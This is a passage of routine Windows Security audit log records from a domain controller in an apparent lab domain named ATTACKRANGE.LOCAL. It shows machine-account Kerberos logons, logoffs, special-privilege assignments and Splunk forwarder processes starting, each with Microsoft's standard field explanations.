Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x761DC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51526
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263792
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761DC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263800
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x762B97
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263799
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x762B97
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51536
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263798
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x762B97
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263801
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263803
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263802
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263804
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263805
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1680
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263807
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263806
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263810
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766646
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263809
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766646
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51549
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263808
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766646
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263821
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766ABA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263820
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BA8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263819
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BF0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263818
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766C62
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51554
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263817
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766C62
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263816
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766BF0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51553
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263815
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BF0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263814
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766BA8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263813
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BA8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263812
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766ABA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51552
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263811
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766ABA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
